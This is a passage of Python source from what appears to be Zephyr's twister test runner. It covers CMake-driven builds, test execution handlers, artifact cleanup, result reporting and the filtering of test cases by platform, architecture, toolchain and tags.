self.capture_output: kwargs['stdout'] = subprocess.PIPE # CMake sends the output of message() to stderr unless it's STATUS kwargs['stderr'] = subprocess.STDOUT if self.cwd: kwargs['cwd'] = self.cwd p = subprocess.Popen(cmd, **kwargs) out, _ = p.communicate() if p.returncode == 0: filter_results = self.parse_generated() msg = "Finished building %s for %s" % (self.source_dir, self.platform.name) logger.debug(msg) results = {'msg': msg, 'filter': filter_results} else: self.instance.status = "error" self.instance.reason = "Cmake build failure" self.instance.fill_results_by_status() logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name)) results = {"returncode": p.returncode} if out: with open(os.path.join(self.build_dir, self.log), "a") as log: log_msg = out.decode(sys.getdefaultencoding()) log.write(log_msg) return results @staticmethod def run_cmake_script(args=[]): logger.debug("Running cmake script %s" % (args[0])) cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]] cmake_args.extend(['-P', args[0]]) logger.debug("Calling cmake with arguments: {}".format(cmake_args)) cmake = shutil.which('cmake') if not cmake: msg = "Unable to find `cmake` in path" logger.error(msg) raise Exception(msg) cmd = [cmake] + cmake_args kwargs = dict() kwargs['stdout'] = subprocess.PIPE # CMake sends the output of message() to stderr unless it's STATUS kwargs['stderr'] = subprocess.STDOUT p = subprocess.Popen(cmd, **kwargs) out, _ = p.communicate() # It might happen that the environment adds ANSI escape codes like \x1b[0m, # for instance if twister is executed from inside a makefile. In such a # scenario it is then necessary to remove them, as otherwise the JSON decoding # will fail. 
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])') out = ansi_escape.sub('', out.decode()) if p.returncode == 0: msg = "Finished running %s" % (args[0]) logger.debug(msg) results = {"returncode": p.returncode, "msg": msg, "stdout": out} else: logger.error("Cmake script failure: %s" % (args[0])) results = {"returncode": p.returncode, "returnmsg": out} return results class FilterBuilder(CMake): def __init__(self, testcase, platform, source_dir, build_dir): super().__init__(testcase, platform, source_dir, build_dir) self.log = "config-twister.log" def parse_generated(self): if self.platform.name == "unit_testing": return {} cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt") defconfig_path = os.path.join(self.build_dir, "zephyr", ".config") with open(defconfig_path, "r") as fp: defconfig = {} for line in fp.readlines(): m = self.config_re.match(line) if not m: if line.strip() and not line.startswith("#"): sys.stderr.write("Unrecognized line %s\n" % line) continue defconfig[m.group(1)] = m.group(2).strip() self.defconfig = defconfig cmake_conf = {} try: cache = CMakeCache.from_file(cmake_cache_path) except FileNotFoundError: cache = {} for k in iter(cache): cmake_conf[k.name] = k.value self.cmake_cache = cmake_conf filter_data = { "ARCH": self.platform.arch, "PLATFORM": self.platform.name } filter_data.update(os.environ) filter_data.update(self.defconfig) filter_data.update(self.cmake_cache) edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle") if self.testcase and self.testcase.tc_filter: try: if os.path.exists(edt_pickle): with open(edt_pickle, 'rb') as f: edt = pickle.load(f) else: edt = None res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt) except (ValueError, SyntaxError) as se: sys.stderr.write( "Failed processing %s\n" % self.testcase.yamlfile) raise se if not res: return {os.path.join(self.platform.name, self.testcase.name): True} else: return {os.path.join(self.platform.name, self.testcase.name): 
False} else: self.platform.filter_data = filter_data return filter_data class ProjectBuilder(FilterBuilder): def __init__(self, suite, instance, **kwargs): super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir) self.log = "build.log" self.instance = instance self.suite = suite self.filtered_tests = 0 self.lsan = kwargs.get('lsan', False) self.asan = kwargs.get('asan', False) self.ubsan = kwargs.get('ubsan', False) self.valgrind = kwargs.get('valgrind', False) self.extra_args = kwargs.get('extra_args', []) self.device_testing = kwargs.get('device_testing', False) self.cmake_only = kwargs.get('cmake_only', False) self.cleanup = kwargs.get('cleanup', False) self.coverage = kwargs.get('coverage', False) self.inline_logs = kwargs.get('inline_logs', False) self.generator = kwargs.get('generator', None) self.generator_cmd = kwargs.get('generator_cmd', None) self.verbose = kwargs.get('verbose', None) self.warnings_as_errors = kwargs.get('warnings_as_errors', True) self.overflow_as_errors = kwargs.get('overflow_as_errors', False) @staticmethod def log_info(filename, inline_logs): filename = os.path.abspath(os.path.realpath(filename)) if inline_logs: logger.info("{:-^100}".format(filename)) try: with open(filename) as fp: data = fp.read() except Exception as e: data = "Unable to read log data (%s)\n" % (str(e)) logger.error(data) logger.info("{:-^100}".format(filename)) else: logger.error("see: " + Fore.YELLOW + filename + Fore.RESET) def log_info_file(self, inline_logs): build_dir = self.instance.build_dir h_log = "{}/handler.log".format(build_dir) b_log = "{}/build.log".format(build_dir) v_log = "{}/valgrind.log".format(build_dir) d_log = "{}/device.log".format(build_dir) if os.path.exists(v_log) and "Valgrind" in self.instance.reason: self.log_info("{}".format(v_log), inline_logs) elif os.path.exists(h_log) and os.path.getsize(h_log) > 0: self.log_info("{}".format(h_log), inline_logs) elif os.path.exists(d_log) and 
os.path.getsize(d_log) > 0: self.log_info("{}".format(d_log), inline_logs) else: self.log_info("{}".format(b_log), inline_logs) def setup_handler(self): instance = self.instance args = [] # FIXME: Needs simplification if instance.platform.simulation == "qemu": instance.handler = QEMUHandler(instance, "qemu") args.append("QEMU_PIPE=%s" % instance.handler.get_fifo()) instance.handler.call_make_run = True elif instance.testcase.type == "unit": instance.handler = BinaryHandler(instance, "unit") instance.handler.binary = os.path.join(instance.build_dir, "testbinary") if self.coverage: args.append("COVERAGE=1") elif instance.platform.type == "native": handler = BinaryHandler(instance, "native") handler.asan = self.asan handler.valgrind = self.valgrind handler.lsan = self.lsan handler.ubsan = self.ubsan handler.coverage = self.coverage handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe") instance.handler = handler elif instance.platform.simulation == "renode": if find_executable("renode"): instance.handler = BinaryHandler(instance, "renode") instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid") instance.handler.call_make_run = True elif instance.platform.simulation == "tsim": instance.handler = BinaryHandler(instance, "tsim") instance.handler.call_make_run = True elif self.device_testing: instance.handler = DeviceHandler(instance, "device") instance.handler.coverage = self.coverage elif instance.platform.simulation == "nsim": if find_executable("nsimdrv"): instance.handler = BinaryHandler(instance, "nsim") instance.handler.call_make_run = True elif instance.platform.simulation == "mdb-nsim": if find_executable("mdb"): instance.handler = BinaryHandler(instance, "nsim") instance.handler.call_make_run = True elif instance.platform.simulation == "armfvp": instance.handler = BinaryHandler(instance, "armfvp") instance.handler.call_make_run = True if instance.handler: instance.handler.args = args instance.handler.generator_cmd = 
self.generator_cmd instance.handler.generator = self.generator def process(self, pipeline, done, message, lock, results): op = message.get('op') if not self.instance.handler: self.setup_handler() # The build process, call cmake and build with configured generator if op == "cmake": res = self.cmake() if self.instance.status in ["failed", "error"]: pipeline.put({"op": "report", "test": self.instance}) elif self.cmake_only: if self.instance.status is None: self.instance.status = "passed" pipeline.put({"op": "report", "test": self.instance}) else: if self.instance.name in res['filter'] and res['filter'][self.instance.name]: logger.debug("filtering %s" % self.instance.name) self.instance.status = "skipped" self.instance.reason = "filter" results.skipped_runtime += 1 for case in self.instance.testcase.cases: self.instance.results.update({case: 'SKIP'}) pipeline.put({"op": "report", "test": self.instance}) else: pipeline.put({"op": "build", "test": self.instance}) elif op == "build": logger.debug("build test: %s" % self.instance.name) res = self.build() if not res: self.instance.status = "error" self.instance.reason = "Build Failure" pipeline.put({"op": "report", "test": self.instance}) else: # Count skipped cases during build, for example # due to ram/rom overflow. 
inst = res.get("instance", None) if inst and inst.status == "skipped": results.skipped_runtime += 1 if res.get('returncode', 1) > 0: pipeline.put({"op": "report", "test": self.instance}) else: if self.instance.run and self.instance.handler: pipeline.put({"op": "run", "test": self.instance}) else: pipeline.put({"op": "report", "test": self.instance}) # Run the generated binary using one of the supported handlers elif op == "run": logger.debug("run test: %s" % self.instance.name) self.run() self.instance.status, _ = self.instance.handler.get_state() logger.debug(f"run status: {self.instance.name} {self.instance.status}") # to make it work with pickle self.instance.handler.thread = None self.instance.handler.suite = None pipeline.put({ "op": "report", "test": self.instance, "status": self.instance.status, "reason": self.instance.reason } ) # Report results and output progress to screen elif op == "report": with lock: done.put(self.instance) self.report_out(results) if self.cleanup and not self.coverage and self.instance.status == "passed": pipeline.put({ "op": "cleanup", "test": self.instance }) elif op == "cleanup": if self.device_testing: self.cleanup_device_testing_artifacts() else: self.cleanup_artifacts() def cleanup_artifacts(self, additional_keep=[]): logger.debug("Cleaning up {}".format(self.instance.build_dir)) allow = [ 'zephyr/.config', 'handler.log', 'build.log', 'device.log', 'recording.csv', ] allow += additional_keep allow = [os.path.join(self.instance.build_dir, file) for file in allow] for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False): for name in filenames: path = os.path.join(dirpath, name) if path not in allow: os.remove(path) # Remove empty directories and symbolic links to directories for dir in dirnames: path = os.path.join(dirpath, dir) if os.path.islink(path): os.remove(path) elif not os.listdir(path): os.rmdir(path) def cleanup_device_testing_artifacts(self): logger.debug("Cleaning up for Device Testing 
{}".format(self.instance.build_dir)) sanitizelist = [ 'CMakeCache.txt', 'zephyr/runners.yaml', ] keep = [ 'zephyr/zephyr.hex', 'zephyr/zephyr.bin', 'zephyr/zephyr.elf', ] keep += sanitizelist self.cleanup_artifacts(keep) # sanitize paths so files are relocatable for file in sanitizelist: file = os.path.join(self.instance.build_dir, file) with open(file, "rt") as fin: data = fin.read() data = data.replace(canonical_zephyr_base+"/", "") with open(file, "wt") as fin: fin.write(data) def report_out(self, results): total_to_do = results.total - results.skipped_configs total_tests_width = len(str(total_to_do)) results.done += 1 instance = self.instance if instance.status in ["error", "failed", "timeout", "flash_error"]: if instance.status == "error": results.error += 1 results.failed += 1 if self.verbose: status = Fore.RED + "FAILED " + Fore.RESET + instance.reason else: print("") logger.error( "{:<25} {:<50} {}FAILED{}: {}".format( instance.platform.name, instance.testcase.name, Fore.RED, Fore.RESET, instance.reason)) if not self.verbose: self.log_info_file(self.inline_logs) elif instance.status == "skipped": status = Fore.YELLOW + "SKIPPED" + Fore.RESET elif instance.status == "passed": status = Fore.GREEN + "PASSED" + Fore.RESET else: logger.debug(f"Unknown status = {instance.status}") status = Fore.YELLOW + "UNKNOWN" + Fore.RESET if self.verbose: if self.cmake_only: more_info = "cmake" elif instance.status == "skipped": more_info = instance.reason else: if instance.handler and instance.run: more_info = instance.handler.type_str htime = instance.handler.duration if htime: more_info += " {:.3f}s".format(htime) else: more_info = "build" logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format( results.done, total_tests_width, total_to_do, instance.platform.name, instance.testcase.name, status, more_info)) if instance.status in ["error", "failed", "timeout"]: self.log_info_file(self.inline_logs) else: completed_perc = 0 if total_to_do > 0: completed_perc = 
int((float(results.done) / total_to_do) * 100) skipped = results.skipped_configs + results.skipped_runtime sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % ( Fore.GREEN, results.done, total_to_do, Fore.RESET, completed_perc, Fore.YELLOW if skipped > 0 else Fore.RESET, skipped, Fore.RESET, Fore.RED if results.failed > 0 else Fore.RESET, results.failed, Fore.RESET ) ) sys.stdout.flush() def cmake(self): instance = self.instance args = self.testcase.extra_args[:] args += self.extra_args if instance.handler: args += instance.handler.args # merge overlay files into one variable def extract_overlays(args): re_overlay = re.compile('OVERLAY_CONFIG=(.*)') other_args = [] overlays = [] for arg in args: match = re_overlay.search(arg) if match: overlays.append(match.group(1).strip('\'"')) else: other_args.append(arg) args[:] = other_args return overlays overlays = extract_overlays(args) if os.path.exists(os.path.join(instance.build_dir, "twister", "testcase_extra.conf")): overlays.append(os.path.join(instance.build_dir, "twister", "testcase_extra.conf")) if overlays: args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays))) res = self.run_cmake(args) return res def build(self): res = self.run_build(['--build', self.build_dir]) return res def run(self): instance = self.instance if instance.handler: if instance.handler.type_str == "device": instance.handler.suite = self.suite instance.handler.handle() sys.stdout.flush() class TestSuite(DisablePyTestCollectionMixin): config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$') dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$') tc_schema = scl.yaml_load( os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "testcase-schema.yaml")) quarantine_schema = scl.yaml_load( os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "quarantine-schema.yaml")) testcase_valid_keys = {"tags": {"type": "set", "required": False}, "type": {"type": "str", "default": 
"integration"}, "extra_args": {"type": "list"}, "extra_configs": {"type": "list"}, "build_only": {"type": "bool", "default": False}, "build_on_all": {"type": "bool", "default": False}, "skip": {"type": "bool", "default": False}, "slow": {"type": "bool", "default": False}, "timeout": {"type": "int", "default": 60}, "min_ram": {"type": "int", "default": 8}, "depends_on": {"type": "set"}, "min_flash": {"type": "int", "default": 32}, "arch_allow": {"type": "set"}, "arch_exclude": {"type": "set"}, "extra_sections": {"type": "list", "default": []}, "integration_platforms": {"type": "list", "default": []}, "platform_exclude": {"type": "set"}, "platform_allow": {"type": "set"}, "toolchain_exclude": {"type": "set"}, "toolchain_allow": {"type": "set"}, "filter": {"type": "str"}, "harness": {"type": "str"}, "harness_config": {"type": "map", "default": {}} } RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "release", "twister_last_release.csv") SAMPLE_FILENAME = 'sample.yaml' TESTCASE_FILENAME = 'testcase.yaml' def __init__(self, board_root_list=[], testcase_roots=[], outdir=None): self.roots = testcase_roots if not isinstance(board_root_list, list): self.board_roots = [board_root_list] else: self.board_roots = board_root_list # Testsuite Options self.coverage_platform = [] self.build_only = False self.cmake_only = False self.cleanup = False self.enable_slow = False self.device_testing = False self.fixtures = [] self.enable_coverage = False self.enable_ubsan = False self.enable_lsan = False self.enable_asan = False self.enable_valgrind = False self.extra_args = [] self.inline_logs = False self.enable_sizes_report = False self.west_flash = None self.west_runner = None self.generator = None self.generator_cmd = None self.warnings_as_errors = True self.overflow_as_errors = False self.quarantine_verify = False # Keep track of which test cases we've filtered out and why self.testcases = {} self.quarantine = {} self.platforms = [] self.platform_names = [] self.selected_platforms 
= [] self.filtered_platforms = [] self.default_platforms = [] self.outdir = os.path.abspath(outdir) self.discards = {} self.load_errors = 0 self.instances = dict() self.total_platforms = 0 self.start_time = 0 self.duration = 0 self.warnings = 0 # hardcoded for now self.duts = [] # run integration tests only self.integration = False self.pipeline = None self.version = "NA" def check_zephyr_version(self): try: subproc = subprocess.run(["git", "describe", "--abbrev=12"], stdout=subprocess.PIPE, universal_newlines=True, cwd=ZEPHYR_BASE) if subproc.returncode == 0: self.version = subproc.stdout.strip() logger.info(f"Zephyr version: {self.version}") except OSError: logger.info("Cannot read zephyr version.") def get_platform_instances(self, platform): filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)} return filtered_dict def config(self): logger.info("coverage platform: {}".format(self.coverage_platform)) # Debug Functions @staticmethod def info(what): sys.stdout.write(what + "\n") sys.stdout.flush() def update_counting(self, results=None, initial=False): results.skipped_configs = 0 results.skipped_cases = 0 for instance in self.instances.values(): if initial: results.cases += len(instance.testcase.cases) if instance.status == 'skipped': results.skipped_configs += 1 results.skipped_cases += len(instance.testcase.cases) elif instance.status == "passed": results.passed += 1 for res in instance.results.values(): if res == 'SKIP': results.skipped_cases += 1 def compare_metrics(self, filename): # name, datatype, lower results better interesting_metrics = [("ram_size", int, True), ("rom_size", int, True)] if not os.path.exists(filename): logger.error("Cannot compare metrics, %s not found" % filename) return [] results = [] saved_metrics = {} with open(filename) as fp: cr = csv.DictReader(fp) for row in cr: d = {} for m, _, _ in interesting_metrics: d[m] = row[m] saved_metrics[(row["test"], row["platform"])] = d for instance in 
self.instances.values(): mkey = (instance.testcase.name, instance.platform.name) if mkey not in saved_metrics: continue sm = saved_metrics[mkey] for metric, mtype, lower_better in interesting_metrics: if metric not in instance.metrics: continue if sm[metric] == "": continue delta = instance.metrics.get(metric, 0) - mtype(sm[metric]) if delta == 0: continue results.append((instance, metric, instance.metrics.get(metric, 0), delta, lower_better)) return results def footprint_reports(self, report, show_footprint, all_deltas, footprint_threshold, last_metrics): if not report: return logger.debug("running footprint_reports") deltas = self.compare_metrics(report) warnings = 0 if deltas and show_footprint: for i, metric, value, delta, lower_better in deltas: if not all_deltas and ((delta < 0 and lower_better) or (delta > 0 and not lower_better)): continue percentage = 0 if value > delta: percentage = (float(delta) / float(value - delta)) if not all_deltas and (percentage < (footprint_threshold / 100.0)): continue logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format( i.platform.name, i.testcase.name, Fore.YELLOW, "INFO" if all_deltas else "WARNING", Fore.RESET, metric, delta, value, percentage)) warnings += 1 if warnings: logger.warning("Deltas based on metrics from last %s" % ("release" if not last_metrics else "run")) def summary(self, results, unrecognized_sections): failed = 0 run = 0 for instance in self.instances.values(): if instance.status == "failed": failed += 1 elif instance.metrics.get("unrecognized") and not unrecognized_sections: logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" % (Fore.RED, Fore.RESET, instance.name, str(instance.metrics.get("unrecognized", [])))) failed += 1 if instance.metrics.get('handler_time', None): run += 1 if results.total and results.total != results.skipped_configs: pass_rate = (float(results.passed) / float(results.total - results.skipped_configs)) else: pass_rate = 0 logger.info( "{}{} of {}{} 
test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format( Fore.RED if failed else Fore.GREEN, results.passed, results.total - results.skipped_configs, Fore.RESET, pass_rate, Fore.RED if results.failed else Fore.RESET, results.failed, Fore.RESET, results.skipped_configs, Fore.YELLOW if self.warnings else Fore.RESET, self.warnings, Fore.RESET, self.duration)) self.total_platforms = len(self.platforms) # if we are only building, do not report about tests being executed. if self.platforms and not self.build_only: logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format( results.cases - results.skipped_cases, results.skipped_cases, len(self.filtered_platforms), self.total_platforms, (100 * len(self.filtered_platforms) / len(self.platforms)) )) logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \ {Fore.RED}{results.total - run - results.skipped_configs}{Fore.RESET} test configurations were only built.") def save_reports(self, name, suffix, report_dir, no_update, release, only_failed, platform_reports, json_report): if not self.instances: return logger.info("Saving reports...") if name: report_name = name else: report_name = "twister" if report_dir: os.makedirs(report_dir, exist_ok=True) filename = os.path.join(report_dir, report_name) outdir = report_dir else: filename = os.path.join(self.outdir, report_name) outdir = self.outdir if suffix: filename = "{}_{}".format(filename, suffix) if not no_update: self.xunit_report(filename + ".xml", full_report=False, append=only_failed, version=self.version) self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed, version=self.version) self.csv_report(filename + ".csv") if json_report: self.json_report(filename + ".json", append=only_failed, version=self.version) if platform_reports: self.target_report(outdir, suffix, append=only_failed) if self.discards: 
self.discard_report(filename + "_discard.csv") if release: self.csv_report(self.RELEASE_DATA) def add_configurations(self): for board_root in self.board_roots: board_root = os.path.abspath(board_root) logger.debug("Reading platform configuration files under %s..." % board_root) for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")): try: platform = Platform() platform.load(file) if platform.name in [p.name for p in self.platforms]: logger.error(f"Duplicate platform {platform.name} in {file}") raise Exception(f"Duplicate platform identifier {platform.name} found") if platform.twister: self.platforms.append(platform) if platform.default: self.default_platforms.append(platform.name) except RuntimeError as e: logger.error("E: %s: can't load: %s" % (file, e)) self.load_errors += 1 self.platform_names = [p.name for p in self.platforms] def get_all_tests(self): tests = [] for _, tc in self.testcases.items(): for case in tc.cases: tests.append(case) return tests @staticmethod def get_toolchain(): toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/verify-toolchain.cmake') result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"]) try: if result['returncode']: raise TwisterRuntimeError(f"E: {result['returnmsg']}") except Exception as e: print(str(e)) sys.exit(2) toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT'] logger.info(f"Using '{toolchain}' toolchain.") return toolchain def add_testcases(self, testcase_filter=[]): for root in self.roots: root = os.path.abspath(root) logger.debug("Reading test case configuration files under %s..." 
% root) for dirpath, _, filenames in os.walk(root, topdown=True): if self.SAMPLE_FILENAME in filenames: filename = self.SAMPLE_FILENAME elif self.TESTCASE_FILENAME in filenames: filename = self.TESTCASE_FILENAME else: continue logger.debug("Found possible test case in " + dirpath) tc_path = os.path.join(dirpath, filename) try: parsed_data = TwisterConfigParser(tc_path, self.tc_schema) parsed_data.load() tc_path = os.path.dirname(tc_path) workdir = os.path.relpath(tc_path, root) for name in parsed_data.tests.keys(): tc = TestCase(root, workdir, name) tc_dict = parsed_data.get_test(name, self.testcase_valid_keys) tc.source_dir = tc_path tc.yamlfile = tc_path tc.type = tc_dict["type"] tc.tags = tc_dict["tags"] tc.extra_args = tc_dict["extra_args"] tc.extra_configs = tc_dict["extra_configs"] tc.arch_allow = tc_dict["arch_allow"] tc.arch_exclude = tc_dict["arch_exclude"] tc.skip = tc_dict["skip"] tc.platform_exclude = tc_dict["platform_exclude"] tc.platform_allow = tc_dict["platform_allow"] tc.toolchain_exclude = tc_dict["toolchain_exclude"] tc.toolchain_allow = tc_dict["toolchain_allow"] tc.tc_filter = tc_dict["filter"] tc.timeout = tc_dict["timeout"] tc.harness = tc_dict["harness"] tc.harness_config = tc_dict["harness_config"] if tc.harness == 'console' and not tc.harness_config: raise Exception('Harness config error: console harness defined without a configuration.') tc.build_only = tc_dict["build_only"] tc.build_on_all = tc_dict["build_on_all"] tc.slow = tc_dict["slow"] tc.min_ram = tc_dict["min_ram"] tc.depends_on = tc_dict["depends_on"] tc.min_flash = tc_dict["min_flash"] tc.extra_sections = tc_dict["extra_sections"] tc.integration_platforms = tc_dict["integration_platforms"] tc.parse_subcases(tc_path) if testcase_filter: if tc.name and tc.name in testcase_filter: self.testcases[tc.name] = tc else: self.testcases[tc.name] = tc except Exception as e: logger.error("%s: can't load (skipping): %s" % (tc_path, e)) self.load_errors += 1 return len(self.testcases) def 
get_platform(self, name): selected_platform = None for platform in self.platforms: if platform.name == name: selected_platform = platform break return selected_platform def load_quarantine(self, file): """ Loads quarantine list from the given yaml file. Creates a dictionary of all tests configurations (platform + scenario: comment) that shall be skipped due to quarantine """ # Load yaml into quarantine_yaml quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema) # Create quarantine_list with a product of the listed # platforms and scenarios for each entry in quarantine yaml quarantine_list = [] for quar_dict in quarantine_yaml: if quar_dict['platforms'][0] == "all": plat = self.platform_names else: plat = quar_dict['platforms'] comment = quar_dict.get('comment', "NA") quarantine_list.append([{".".join([p, s]): comment} for p in plat for s in quar_dict['scenarios']]) # Flatten the quarantine_list quarantine_list = [it for sublist in quarantine_list for it in sublist] # Change quarantine_list into a dictionary for d in quarantine_list: self.quarantine.update(d) def load_from_file(self, file, filter_status=[], filter_platform=[]): try: with open(file, "r") as fp: cr = csv.DictReader(fp) instance_list = [] for row in cr: if row["status"] in filter_status: continue test = row["test"] platform = self.get_platform(row["platform"]) if filter_platform and platform.name not in filter_platform: continue instance = TestInstance(self.testcases[test], platform, self.outdir) if self.device_testing: tfilter = 'runnable' else: tfilter = 'buildable' instance.run = instance.check_runnable( self.enable_slow, tfilter, self.fixtures ) instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform) instance_list.append(instance) self.add_instances(instance_list) except KeyError as e: logger.error("Key error while parsing tests file.({})".format(str(e))) sys.exit(2) except FileNotFoundError as e: logger.error("Couldn't find 
                         input file with list of tests. ({})".format(e))
            sys.exit(2)

    def apply_filters(self, **kwargs):
        """Build the list of test instances to run, recording every filtered-out
        (platform, testcase) combination in a ``discards`` dict keyed by instance.

        Recognized kwargs: platform, exclude_platform, run_individual_tests,
        arch, tag, exclude_tag, all, runnable, force_toolchain, force_platform,
        emulation_only.  Returns the discards dict (also stored on self.discards).
        """
        toolchain = self.get_toolchain()

        discards = {}
        platform_filter = kwargs.get('platform')
        exclude_platform = kwargs.get('exclude_platform', [])
        testcase_filter = kwargs.get('run_individual_tests', [])
        arch_filter = kwargs.get('arch')
        tag_filter = kwargs.get('tag')
        exclude_tag = kwargs.get('exclude_tag')
        all_filter = kwargs.get('all')
        runnable = kwargs.get('runnable')
        force_toolchain = kwargs.get('force_toolchain')
        force_platform = kwargs.get('force_platform')
        emu_filter = kwargs.get('emulation_only')

        logger.debug("platform filter: " + str(platform_filter))
        logger.debug(" arch_filter: " + str(arch_filter))
        logger.debug(" tag_filter: " + str(tag_filter))
        logger.debug(" exclude_tag: " + str(exclude_tag))

        default_platforms = False
        emulation_platforms = False

        if all_filter:
            logger.info("Selecting all possible platforms per test case")
            # When --all used, any --platform arguments ignored
            platform_filter = []
        elif not platform_filter and not emu_filter:
            logger.info("Selecting default platforms per test case")
            default_platforms = True
        elif emu_filter:
            logger.info("Selecting emulation platforms per test case")
            emulation_platforms = True

        # Narrow the candidate platform set according to the command line.
        if platform_filter:
            self.verify_platforms_existence(platform_filter, f"platform_filter")
            platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
        elif emu_filter:
            platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
        elif arch_filter:
            platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
        elif default_platforms:
            platforms = list(filter(lambda p: p.default, self.platforms))
        else:
            platforms = self.platforms

        logger.info("Building initial testcase list...")

        for tc_name, tc in self.testcases.items():

            # Per-testcase platform scope: build_on_all widens it to every
            # platform; integration mode narrows it to integration_platforms.
            if tc.build_on_all and not platform_filter:
                platform_scope = self.platforms
            elif tc.integration_platforms and self.integration:
                self.verify_platforms_existence(
                    tc.integration_platforms, f"{tc_name} - integration_platforms")
                platform_scope = list(filter(lambda item: item.name in tc.integration_platforms, \
                                             self.platforms))
            else:
                platform_scope = platforms

            integration = self.integration and tc.integration_platforms

            # If there isn't any overlap between the platform_allow list and the platform_scope
            # we set the scope to the platform_allow list
            if tc.platform_allow and not platform_filter and not integration:
                self.verify_platforms_existence(
                    tc.platform_allow, f"{tc_name} - platform_allow")
                a = set(platform_scope)
                b = set(filter(lambda item: item.name in tc.platform_allow, self.platforms))
                c = a.intersection(b)
                if not c:
                    platform_scope = list(filter(lambda item: item.name in tc.platform_allow, \
                                                 self.platforms))

            # list of instances per testcase, aka configurations.
            instance_list = []
            for plat in platform_scope:
                instance = TestInstance(tc, plat, self.outdir)
                if runnable:
                    tfilter = 'runnable'
                else:
                    tfilter = 'buildable'
                instance.run = instance.check_runnable(
                    self.enable_slow,
                    tfilter,
                    self.fixtures
                )
                for t in tc.cases:
                    instance.results[t] = None

                # A connected DUT providing the required fixture makes the
                # instance runnable even if check_runnable() said otherwise.
                if runnable and self.duts:
                    for h in self.duts:
                        if h.platform == plat.name:
                            if tc.harness_config.get('fixture') in h.fixtures:
                                instance.run = True

                # From here on, each failed check records a discard reason;
                # discards.get(...) keeps the FIRST reason recorded.
                if not force_platform and plat.name in exclude_platform:
                    discards[instance] = discards.get(instance, "Platform is excluded on command line.")

                if (plat.arch == "unit") != (tc.type == "unit"):
                    # Discard silently
                    continue

                if runnable and not instance.run:
                    discards[instance] = discards.get(instance, "Not runnable on device")

                if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
                    discards[instance] = discards.get(instance, "Not part of integration platforms")

                if tc.skip:
                    discards[instance] = discards.get(instance, "Skip filter")

                if tag_filter and not tc.tags.intersection(tag_filter):
                    discards[instance] = discards.get(instance, "Command line testcase tag filter")

                if exclude_tag and tc.tags.intersection(exclude_tag):
                    discards[instance] = discards.get(instance, "Command line testcase exclude filter")

                if testcase_filter and tc_name not in testcase_filter:
                    discards[instance] = discards.get(instance, "Testcase name filter")

                if arch_filter and plat.arch not in arch_filter:
                    discards[instance] = discards.get(instance, "Command line testcase arch filter")

                if not force_platform:

                    if tc.arch_allow and plat.arch not in tc.arch_allow:
                        discards[instance] = discards.get(instance, "Not in test case arch allow list")

                    if tc.arch_exclude and plat.arch in tc.arch_exclude:
                        discards[instance] = discards.get(instance, "In test case arch exclude")

                    if tc.platform_exclude and plat.name in tc.platform_exclude:
                        discards[instance] = discards.get(instance, "In test case platform exclude")

                if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
                    discards[instance] = discards.get(instance, "In test case toolchain exclude")

                if platform_filter and plat.name not in platform_filter:
                    discards[instance] = discards.get(instance, "Command line platform filter")

                if tc.platform_allow and plat.name not in tc.platform_allow:
                    discards[instance] = discards.get(instance, "Not in testcase platform allow list")

                if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
                    discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")

                if not plat.env_satisfied:
                    discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))

                if not force_toolchain \
                        and toolchain and (toolchain not in plat.supported_toolchains) \
                        and "host" not in plat.supported_toolchains \
                        and tc.type != 'unit':
                    discards[instance] = discards.get(instance, "Not supported by the toolchain")

                if plat.ram < tc.min_ram:
                    discards[instance] = discards.get(instance, "Not enough RAM")

                if tc.depends_on:
                    dep_intersection = tc.depends_on.intersection(set(plat.supported))
                    if dep_intersection != set(tc.depends_on):
                        discards[instance] = discards.get(instance, "No hardware support")

                if plat.flash < tc.min_flash:
                    discards[instance] = discards.get(instance, "Not enough FLASH")

                if set(plat.ignore_tags) & tc.tags:
                    discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")

                if plat.only_tags and not set(plat.only_tags) & tc.tags:
                    discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")

                test_configuration = ".".join([instance.platform.name,
                                               instance.testcase.id])
                # skip quarantined tests
